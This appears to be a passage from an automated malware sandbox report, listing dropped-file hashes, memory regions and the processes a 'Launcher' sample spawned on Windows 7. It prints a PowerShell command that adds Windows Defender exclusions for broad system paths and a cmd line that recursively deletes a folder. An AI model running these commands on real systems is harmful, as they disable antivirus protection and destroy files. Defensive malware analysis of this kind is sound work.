| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar33DC.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
| MD5 | e5c00b0bc45281666afd14eef04252b2 |
| SHA1 | 3b6eecf8250e88169976a5f866d15c60ee66b758 |
| SHA256 | 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903 |
| SHA512 | 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll
| MD5 | 7de0541eb96ba31067b4c58d9399693b |
| SHA1 | a105216391bd53fa0c8f6aa23953030d0c0f9244 |
| SHA256 | 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e |
| SHA512 | e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest
| MD5 | f0fc065f7fd974b42093594a58a4baef |
| SHA1 | dbf28dd15d4aa338014c9e508a880e893c548d00 |
| SHA256 | d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693 |
| SHA512 | 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 92d8d95e08e0ed032c475e03b7b71a39 |
| SHA1 | 8097f925f154beb29dafd67be1aca9ac77216d35 |
| SHA256 | 1ae0280cb090310b1958b961de3a62f2c845e5a90c2085623055873a7b04f945 |
| SHA512 | 98c316f89214de24c3fc493d0ac54e4cbe745fbd3c726c697309276a3628cdb330708eaeda972d22c3096cf525a0befa3a6f906586c68fb69c7736820e8c823a |
memory/2064-191-0x0000000000770000-0x0000000000771000-memory.dmp
memory/2132-240-0x00000000732F0000-0x000000007389B000-memory.dmp
memory/2132-241-0x00000000028E0000-0x0000000002920000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
| MD5 | fea10d11d84919cb9a0a0752d61c0a66 |
| SHA1 | aea3c65e2b62851b2dd112597f28379b49c58a0a |
| SHA256 | 2786febdd57874118eaf5e257382cf4467d43f9ca189ac48ff6d45494f1cbab7 |
| SHA512 | e382f79ec1f1c370cd0053cccc7a0db8f3dc28b22f9dacd5f425c60adfb21e4a6eed3e119a7f9bbf135839e22d46511ca793cf8b5118d0e6256ebbbe749fc508 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest
| MD5 | 1b6de83d3f1ccabf195a98a2972c366a |
| SHA1 | 09f03658306c4078b75fa648d763df9cddd62f23 |
| SHA256 | e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724 |
| SHA512 | e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
| MD5 | f58866e5a48d89c883f3932c279004db |
| SHA1 | e72182e9ee4738577b01359f5acbfbbe8daa2b7f |
| SHA256 | d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12 |
| SHA512 | 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177 |
memory/2032-337-0x00000000002D0000-0x00000000002D1000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2655e2a76e885674671adc7b49775d0f |
| SHA1 | e898c14453462ff74890ae7a0605f9f3768dc186 |
| SHA256 | cebbed461ce55e262cf0925b3cfd5d3284987e3bd9ca15ba92bf89c1a27a1c77 |
| SHA512 | 6ef55295c0ba3715352984283d0b83b32ba0148a2d72b63a3ad83fd96ebc57d9f62b63bda6210222c306aa4fb4d541cc101cbf4c3ded863395d3a17bd87baf5c |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | f26050082c253bf4fae497bfe9298cf8 |
| SHA1 | 44da3b4df3a8c6c685f4bbaeb0729c0c561e0ff5 |
| SHA256 | 1af3c67817862c85b454f35e67626b313d0b2898e97d7f24e9c843238556134d |
| SHA512 | 32067a98e18e0bbd2cf38ac67d80c690b199202a9316d2ed86ba5482551d674eade77a3def878bdcc9877ee161b72b942c5784e4a3dfe760a582a62e273b84e0 |
memory/2724-388-0x00000000732F0000-0x000000007389B000-memory.dmp
memory/2724-389-0x0000000003050000-0x0000000003090000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 69181a231548b6ec4ebdb9e8fa2ae164 |
| SHA1 | aa9def129e58f3226e98289aeb9a8619a5ce37a2 |
| SHA256 | cc8bfcaea245a8f5bea718a9e6718860de34eefad4ee9210f182d33ddd80878d |
| SHA512 | fd4ed0dda7e777a14417f22c82fd51157389fd7a2f1217785a68f3899babc830eb98eba8c3346ae5a0498b3ed57631e227961e8e2e045605ee71e04e88c974fe |
memory/2724-432-0x00000000732F0000-0x000000007389B000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | f60f7771862f3033bb8c4ed8b606e237 |
| SHA1 | 895528e7f626908d432118ef83d1b77c86188614 |
| SHA256 | ee56c042191fbbebb1080b57fd6588391e64a76a500e5908e07d9b6c86b1ffa3 |
| SHA512 | 3ab3388ac3731538f7d39ba460e8e21d76691e50aa3e38b0654d9c543ab1a81c77c55b04565998d67450960a2cec6c89bfe7082b6148053809b71b80fc63f212 |
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 3b90f8e1575171630c6726251b2115b8 |
| SHA1 | 5ad9ab0352052ebdad5ea12266b0f36a0c2d1876 |
| SHA256 | 4ea8337c328efa59b8107797533cb4240da99b3ae4f91a3d8d095a6192a253c1 |
| SHA512 | 9cb1d0de46f007dbba26540013efc47c38b68542838af4f7822c887b4ffaf15d66a67f907c82b14f7a14ecc709afebec7ddfbeeb0456e763fcf1389649a5cf4c |
\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | c97b549ec1631b3a00810dd5af451467 |
| SHA1 | 2364222b46a4953fc7a94d4128be3c4e7a7ff3c9 |
| SHA256 | 23478ae229e0bdfcf7c620faf507902781236ac937401b0da5837eb666d77957 |
| SHA512 | 3a4e34f44f490114149384b77eef2c067a8e54e06cc413a6da835faf884e5ca143c28b16602800c35971ab81821bb717c36fb84c22dc5e04f11b9236168bb772 |
\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 2fbe28f784da9caf6cbeefca0a50bb61 |
| SHA1 | bfa34c66f23a807f9fb9c2e652a8c73aee9d7682 |
| SHA256 | 6ca1e09b19c03cf7c3ade1521f9758631379d5fa68ec06cbaf815e0dc5cc3669 |
| SHA512 | b1eec0bdf023a8c375690fda2aacb3511e8c0ce87cb9ffe4380fa204616e1db8cda6de9742a7bc3c68bffce7805098283eedb60e183396327a462fd2bf5bf04e |
memory/1320-511-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\WinRAR.exe
| MD5 | f59f4f7bea12dd7c8d44f0a717c21c8e |
| SHA1 | 17629ccb3bd555b72a4432876145707613100b3e |
| SHA256 | f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4 |
| SHA512 | 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c |
C:\Users\Admin\AppData\Roaming\services\01plugins0228.rar
| MD5 | 907c1e4e19a50fff3ac19087ebe04295 |
| SHA1 | 699187f7bfb7e65d05d445b46f9583c77f519c0e |
| SHA256 | 115c37d38945ee56b0e7a23cf90c60f63191aaf312c207c8ac5ab719a1500158 |
| SHA512 | 5da0d6b688c09d926881512f698ec8d205c08c37eb51f2a18471aa3f99aeb7a771030c170ea933cc67f17852a433359ce9c51fcfcff780cb6d35d78d0eb5e9c7 |
memory/2132-519-0x00000000732F0000-0x000000007389B000-memory.dmp
\Users\Admin\AppData\Roaming\services\plugin0228
| MD5 | 626fb04cdd464c32c07e7a9610f7fb11 |
| SHA1 | cf6d3a911e2b915b52f00777a6bc984f2a26f61a |
| SHA256 | 3d1c1ba663250f344a2a2bc64c294755ec2367d03540cd851485c47a1b858c09 |
| SHA512 | 7fcfb2971e2ccc837af3325cbffa4560afe04d43491ce08524f25659ae78d798c4996764ed1ca56152b7fc65ade16f0e064a6d2a6ffb1f7d818bcc44e761f338 |
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 8c04808e4ba12cb793cf661fbbf6c2a0 |
| SHA1 | bdfdb50c5f251628c332042f85e8dd8cf5f650e3 |
| SHA256 | a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272 |
| SHA512 | 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f |
memory/940-527-0x0000000000A30000-0x0000000000AC2000-memory.dmp
memory/940-528-0x000000006FDB0000-0x000000007049E000-memory.dmp
memory/2132-529-0x00000000028E0000-0x0000000002920000-memory.dmp
memory/940-530-0x00000000008C0000-0x0000000000900000-memory.dmp
memory/892-532-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-537-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-538-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/892-536-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-540-0x0000000000400000-0x000000000046E000-memory.dmp
memory/940-543-0x000000006FDB0000-0x000000007049E000-memory.dmp
memory/892-544-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-546-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-535-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-534-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-533-0x0000000000400000-0x000000000046E000-memory.dmp
memory/1076-556-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
| MD5 | 5c25f9d663d5046a6ea67ddb0a38a0b7 |
| SHA1 | 45954bd948dc3fe167ec61f7f26c7d3f10a75456 |
| SHA256 | 342a712649402888b6b9dbe23e32977b79468df10024d485b117e8a1c5019e2e |
| SHA512 | b296587b47d7f9b6d35990e28bef6551201814c8ab7bf601c8e1c976f64e36686eb5495ad0eacc4268168c865713f551442767f5215d5864f20d23ed1c1d9ca4 |
C:\Users\Admin\AppData\Roaming\services\02plugins2901.rar
| MD5 | 82a56a666981e9e163a1aba74dc70aa8 |
| SHA1 | 709e44e71ff38d0771d839b74f270c23daa42f64 |
| SHA256 | c59448b470702a689cb0525b76d28d68b2436c4f23cac4ee18a32a7a99801eb6 |
| SHA512 | ed02644d9621256b2c0bd43eac5d46f1be3ccf741b3701ff624e0f0913bd6829d818d3006619f90fded694c01940e4fca7b1eac92cd647b87212efd4532ccbe0 |
\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | 5923f9aebbd8823243abe4aed8440722 |
| SHA1 | 45fa1d4b3ba7215258c101474460128e6baab023 |
| SHA256 | 2481bd7384999300c927b6df6da7cd8530ef3e6c8dcdcd7b15905f54876e69cc |
| SHA512 | 7dd991cf7d0bc642722584ec6562ffaf98964a303d263cf05305c6ba7e4f5d42cbd22d8ac022cb3ca3ef80b4817158824c32a66acf578bfd7c698e26871ec833 |
C:\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | cc4663c472430ec6a134bef0cd91b4db |
| SHA1 | 82663163ce7684dc841f194c8fdc310129656629 |
| SHA256 | d0d2cf544534e478b36e72127ace46e35ef4ad506168a67651717d674a5dbf8e |
| SHA512 | a178d30bfe3a632b2b6f2abc48d6621e5aef56257a4f0d5755a19d2edf11a007776d301285d25cf3bdb2e22e5ef0a1f41b16091d6988a7a380e0c8abeb1f2219 |
\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | 93df559b47f6d389a6e8ea691512181e |
| SHA1 | e328e083126d1f6cdf8ebb62c4862ce4c4b2ab34 |
| SHA256 | 0cdc6cab294b2810a9b02b53472cfa19ee1a902d4dd970c64a071c9074c3b5cc |
| SHA512 | 089289cfde470b7d4d920b2614aeca7b7af631525e019f322e1046dec6f8e93fae09af4a80e727ddd1df5c4363e3d2f04f52a6c8624634b2388ab7c2765637fa |
C:\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | 5ba443e64e0470a395963cd22d9a4d3e |
| SHA1 | 06a01f1678ef638a64246f9a3e66bbc02860751a |
| SHA256 | bd007fca2ab1bfd5b7beaadad8e5398300738542efa5e1bc3c18d5410e3ea38c |
| SHA512 | ffcc47119df77dc62cdd50ff7f04bba94d46acb04a2ae79e9a5d53fb51ecd3232e76f09e1ed054533ca6b6d6ff9ecbd52331f99c99abbdebb7a518843449f2a2 |
\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 62185595bbcf4b826eb5469666bc714c |
| SHA1 | 5ef3394be9b9a80677cacc40a2ba641ae3de0f39 |
| SHA256 | ed5b8830d0bce2d9ea7aa0d9d90cbf9b906695096767a8040288e0024ad78e26 |
| SHA512 | 262d0fb0507bf29c838a0cc1dca68212667934723da5e3e9b40aa84b0676d5ecc62da36e5fec98ba9e43e9bff1a2d7e347a84c07ad739b1e1c337cebe7c167cc |
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 08c19f7f8097b98c293dbcca676f4030 |
| SHA1 | b3b78f7f05bb595175592eff785d462a71f0e547 |
| SHA256 | 83226d02897b5d65ddbe44f1085820c9ab2cbc7629be8732b46f54aaed074a68 |
| SHA512 | 8e4795386cf0edc6cc9db97aa0fff5af4f97aeabff1e09a875bb6d67306648769b8c51f3e18f413d8d1c2a7891b70eeb6efa125eb0cca6957948c3f587e3e403 |
memory/2032-567-0x0000000005790000-0x0000000006125000-memory.dmp
memory/2032-571-0x0000000005790000-0x0000000006125000-memory.dmp
\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | dc7600a49a0c309dabc44f27de286c4a |
| SHA1 | 989f8d07e584b88b3e3915bdb931a888c6cdc4e1 |
| SHA256 | 26a4e3485a71daeba27ae357fa40e69b178bea9972bca6be522b02cc19412f4c |
| SHA512 | 80728c670924fe77cfa9a663101cbe4e895570ab42b7123656641e86f4e1974845405ea62318887378762d5c6a0a3dd81fe858b5f2c91826d172411421d07ae4 |
memory/632-572-0x000000013FCD0000-0x0000000140665000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
| MD5 | b1dadb6a6f4352ac7c5550edcfc9a26e |
| SHA1 | 1e9132fd9ffb482a32ebda6be611d94fb8860a0a |
| SHA256 | a4f1d9050333968d0d2f8e973c560900ba20d4a9b078418382f2dfcc8ec031b4 |
| SHA512 | 49ba8107ddbef6f8092dcd35bc228999d26dd6fa02ab831f511a8b81d48bc395e8a4ce6b2a879f0e3547bfbe9364a7346331db23874f05eac0e574853e998458 |
memory/1540-576-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\03plugins0228.rar
| MD5 | bb3d6b72aaed5ded805671498c11ca52 |
| SHA1 | 718dfed5265c72fa974061d9ee7ae4bae56d6f49 |
| SHA256 | 76960fd3b763ec4b563151c332030d898a9edb58697ebb2058e388f227f2619a |
| SHA512 | dbe7c5cf11a2003990af7fdb76fa00ae56757a0a2327a598a4fb70a1e65e08cbf2290f00e86f738534cd3e4d1c185ca729709a11d759aca04c256df3d9d0694b |
memory/2856-585-0x000007FEF5780000-0x000007FEF611D000-memory.dmp
memory/2856-584-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
memory/2856-586-0x0000000002A30000-0x0000000002AB0000-memory.dmp
memory/2856-587-0x000007FEF5780000-0x000007FEF611D000-memory.dmp
memory/2856-588-0x0000000002A30000-0x0000000002AB0000-memory.dmp
memory/2856-589-0x0000000002320000-0x0000000002328000-memory.dmp
memory/2856-591-0x0000000002A30000-0x0000000002AB0000-memory.dmp
memory/2856-594-0x000007FEF5780000-0x000007FEF611D000-memory.dmp
memory/632-597-0x000000013FCD0000-0x0000000140665000-memory.dmp
\ProgramData\SystemFiles\csrss.exe
| MD5 | 1622f2d763733fe78cd6e6e446ec01a1 |
| SHA1 | b606e800f2c787f411e8fd3f2b8a6b52f8ae215f |
| SHA256 | a47632f601940f48ad1498c3fe5689680f90b0798ebd246ea2db53040ffcd601 |
| SHA512 | 07a833cff05500dfac60f77816ca88346e4e55bdae8c3245eeae34b7f2c8df4d08320d90ae0eca6d7df89794d3f67221e09b526fee6face8a575246a488108ba |
C:\ProgramData\SystemFiles\csrss.exe
| MD5 | a732f1d295f160607cc0598d3b784480 |
| SHA1 | 66b3301dca81faa9262cd160b8940c0d6da329c0 |
| SHA256 | fe2a9807c3053bc4bb39b16ae7a8d9357c7865dc367aca32b4b19870c82b88ba |
| SHA512 | 1b22637314ce91ac37d516d9c17bc5e2e8b5f0533c181bcfa042e1366f662bf2a44b17f03eece21c87989300994f0709fc6eb286b13dd24d05d5c442e2c2347e |
\ProgramData\SystemFiles\csrss.exe
| MD5 | 503cd13732f073017c1cfa04001e41e7 |
| SHA1 | 4933382f6ac5e4fb60dc2f795fb83d5301e6dcfa |
| SHA256 | b241e4e7606eef11487c40bd932bace873cb8806ac9a2d6137fcd79b616bfeca |
| SHA512 | 4c4ed3c99254fa3d3a4ce274dbe8283c78744add5f053707b60a3ed8b89ac1d297a45a7812ff1ead334af743fbe1c64f01df331dd96edb16dace8a17fddbb067 |
memory/1664-601-0x000000013F360000-0x000000013FCF5000-memory.dmp
memory/588-603-0x00000000014E0000-0x0000000001560000-memory.dmp
memory/588-602-0x000007FEF4DE0000-0x000007FEF577D000-memory.dmp
memory/588-604-0x000007FEF4DE0000-0x000007FEF577D000-memory.dmp
memory/588-605-0x00000000014E0000-0x0000000001560000-memory.dmp
memory/2032-606-0x0000000005790000-0x0000000006125000-memory.dmp
memory/2032-607-0x0000000005790000-0x0000000006125000-memory.dmp
memory/588-608-0x00000000014E0000-0x0000000001560000-memory.dmp
\Users\Admin\AppData\Roaming\services\3plugin0228
| MD5 | e1b77451ec2dc82087eaff231d1fe7fb |
| SHA1 | 5e5ce20b411508343f6482c6124ebbd5a2c91358 |
| SHA256 | 8920996ac3aab57499b1bd2b3d9c6dc5066c09b10351c31c296e7b5282645a6c |
| SHA512 | 6c07ae0ad70d129ab7a10cb190004435909f4d4e9e86776a3cd149d06c088b0662696d277517072912ffd75ce532369fc9fddee08f2ab3296f03c887e7b6501a |
C:\Users\Admin\AppData\Roaming\services\3plugin0228
| MD5 | 50067874be1aca9c03c561617bac8421 |
| SHA1 | 37c793ea5a810be7d0fc54193e0380dedf6a82e8 |
| SHA256 | 71f6f8ab6fd7451b006ea1d8d58ddfd01a91f7409b6c5fa8dc719435e1f4e89e |
| SHA512 | 34af187fc18c56605dea122aacc6d546c5bb59ced7fc5c2707ed35895ffab0ebbff661b092ab6f285e30751dbc14aa5bd6f62d90b3560352638b6b2e01107c7e |
memory/588-612-0x00000000014E0000-0x0000000001560000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\3plugin0228
| MD5 | 0f40c938cce6c869f4f3a442e1368684 |
| SHA1 | 9c1a1d887196d4cda13dcf112dcdbe97b9d1a111 |
| SHA256 | b842d584d6369d5508996b09c443e3d748e0d491a0fab09a4980ec5440931a94 |
| SHA512 | 97921807489acc79a444fa7ef021f98afb1630ed8b94df98feca144870a5f11d046178ea3df305032fc1e2fedd66efffbdd8f14aac2a3039c879ad639f5f36c9 |
memory/2988-614-0x000000006F710000-0x000000006FDFE000-memory.dmp
memory/588-615-0x000007FEF4DE0000-0x000007FEF577D000-memory.dmp
memory/2988-613-0x00000000000F0000-0x000000000016A000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | 7575c74a6cb2582fe872ec4e5c34d9ae |
| SHA1 | 8616d5c5687df7133cb3320d131ab82a25197ca7 |
| SHA256 | 5cfc757280526df2130740c4fc1722623bb6a51866af1b4f4fba8acaf2b23064 |
| SHA512 | 8afc0d7c08397a0efc03b313fd9a4986f29c3415ccd640e582fa60a0d3696539243e8d3859cd1b06aea632646b5eb31ffff5cc73ca3df1ac178f44397607b860 |
memory/1880-618-0x0000000140000000-0x000000014000D000-memory.dmp
memory/1880-622-0x0000000140000000-0x000000014000D000-memory.dmp
memory/1880-624-0x0000000140000000-0x000000014000D000-memory.dmp
C:\ProgramData\SystemFiles\csrss.exe
| MD5 | 828fd6d7f7cf0fb6745fd777136e5e3f |
| SHA1 | a4a7bd66e2bc3c495047140b9c35cdc0eb9efd70 |
| SHA256 | 5e39ebea2d3afa9fcebbc8048a8df8c1d0cb726840489f4b8839a45bf7bbbb9f |
| SHA512 | 1caa219ba53f989f37d25610f27783c359f7ff6d7a9f8415e7b3b063060cb0d02c03996345777a879207fb7361e48e51c4629627875020b053fdb54efd79a2f0 |
memory/2932-627-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-629-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-626-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/1880-621-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2932-630-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2988-632-0x0000000004890000-0x00000000048D0000-memory.dmp
memory/1664-633-0x000000013F360000-0x000000013FCF5000-memory.dmp
memory/2932-635-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/1880-620-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2932-636-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/1880-619-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2080-638-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-637-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-639-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-640-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-641-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-642-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-643-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2080-645-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-644-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-646-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-647-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-650-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-651-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-648-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-649-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2932-652-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2988-654-0x000000006F710000-0x000000006FDFE000-memory.dmp
memory/2932-655-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-656-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-657-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-659-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-660-0x0000000000240000-0x0000000000241000-memory.dmp
memory/2080-658-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-661-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-662-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-663-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-664-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-665-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-666-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-667-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-668-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-670-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-669-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-673-0x00000000772B0000-0x0000000077459000-memory.dmp
memory/2440-680-0x000007FEF5780000-0x000007FEF611D000-memory.dmp
memory/2440-681-0x00000000013F0000-0x0000000001470000-memory.dmp
memory/2440-684-0x00000000013F0000-0x0000000001470000-memory.dmp
memory/2440-683-0x00000000013F0000-0x0000000001470000-memory.dmp
memory/2440-682-0x000007FEF5780000-0x000007FEF611D000-memory.dmp
memory/2440-689-0x000007FEF5780000-0x000007FEF611D000-memory.dmp
C:\ProgramData\SystemFiles\csrss.exe
| MD5 | dac7dea4ffd76a03f052c6a31a1233ce |
| SHA1 | 1b08dcebc80369106b4022b417ab6391adcd9301 |
| SHA256 | 1978f676cbe6a20f2a3ac14196674469a0962443f1e65f586a4cee66e61fddde |
| SHA512 | 2ede6120cdda4bfbed13f13b99e94fb7055d0639735f4952a74ceaf6d60acb7d42fbba2506ea0d45ed5365d580277638b8854773eabf1fed273db40d61875501 |
memory/2232-693-0x000000013FCC0000-0x0000000140655000-memory.dmp
memory/2948-695-0x00000000010B0000-0x0000000001130000-memory.dmp
memory/2948-694-0x000007FEF4DE0000-0x000007FEF577D000-memory.dmp
memory/2948-696-0x000007FEF4DE0000-0x000007FEF577D000-memory.dmp
memory/2948-698-0x00000000010B0000-0x0000000001130000-memory.dmp
memory/2948-697-0x00000000010B0000-0x0000000001130000-memory.dmp
memory/2948-699-0x00000000010B0000-0x0000000001130000-memory.dmp
memory/2948-700-0x000007FEF4DE0000-0x000007FEF577D000-memory.dmp
memory/2232-704-0x000000013FCC0000-0x0000000140655000-memory.dmp
memory/2932-707-0x0000000000940000-0x0000000000960000-memory.dmp
memory/2132-708-0x00000000732F0000-0x000000007389B000-memory.dmp
memory/2932-709-0x00000000772B0000-0x0000000077459000-memory.dmp
memory/2932-710-0x0000000000940000-0x0000000000960000-memory.dmp
memory/2932-715-0x0000000000940000-0x0000000000960000-memory.dmp
memory/2932-716-0x00000000009B0000-0x00000000009D0000-memory.dmp
memory/2932-722-0x0000000000940000-0x0000000000960000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win7-20240221-en
Max time kernel
1799s
Max time network
1819s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win7-20240221-en
Max time kernel
1801s
Max time network
1820s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
Files
memory/1812-0-0x00000000002E0000-0x00000000002E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab8D34.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
